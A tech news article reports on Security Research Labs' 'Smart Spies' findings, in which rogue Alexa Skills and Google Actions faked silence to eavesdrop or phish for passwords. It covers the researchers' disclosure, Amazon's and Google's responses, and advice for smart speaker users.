Yep, your smart speaker can spy on you and steal your passwords
Just while Amazon and Google are desperately trying to convince us they’re not listening to everything we say, security researchers have demonstrated how easily these devices can be infiltrated by hackers who will eavesdrop on your conversations. And also – just for giggles – phish for your passwords.
A German research group Security Research Labs discovered a vulnerability they’ve dubbed Smart Spies. Through various trickery it adds a long pause to Alexa or Google’s response to make you think it’s no longer listening.
It then prompts you, while mimicking Alexa or Google, to update your device and asks for personally identifiable information such as a password, or simply continues to listen in and record your conversations, transcribing what you say and sending a transcript to the hacker.
Read this: Digging into Amazon’s new privacy tools
According to a report by ArsTechnica, the vulnerability gets in because even though both Amazon and Google review Skills and Actions before they are added to the platforms, updates are not reviewed, so a seemingly innocuous app can go rogue with no one being any the wiser.
The security researchers developed eight apps – four Alexa Skills and four Google Home Actions, that were able to do exactly this. Mainly simple horoscope apps behind the scenes they were able to listen in or convince users to give up passwords or email addresses.
In an email to Gizmodo, Security Research Labs said the vulnerability was discovered in February. “We were surprised to see the Smart Spies hacks still worked more than three months after reporting the issues to Google and Amazon,” they wrote.
The apps are no longer available, but you can see demonstrations of how they work on YouTube videos posted by the researchers to their blog page.
“Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers,” they wrote on their blog. “Using a new voice app should be approached with a similar level of caution as installing a new app on your smartphone.”
Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers
Security Research Labs shared its findings with the companies, and have recommended that they implement more thorough review processes of third-party skills and actions.
Amazon respond to the group with the following statement:
“Customer trust is important to us, and we conduct security reviews as part of the skill certification process. We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.”
They also said they have put “mitigations” in place to prevent the issues raised, and pointed out that users should never share their password with devices over voice, any request for such information is not from Amazon.
Google’s response was similar. “All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies. We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future.”
There is little to no evidence, according to the researchers, that there are any such apps currently threatening Alexa and Google Home users, however users of these devices need to remain vigilant of any suspicious activity on their smart speakers.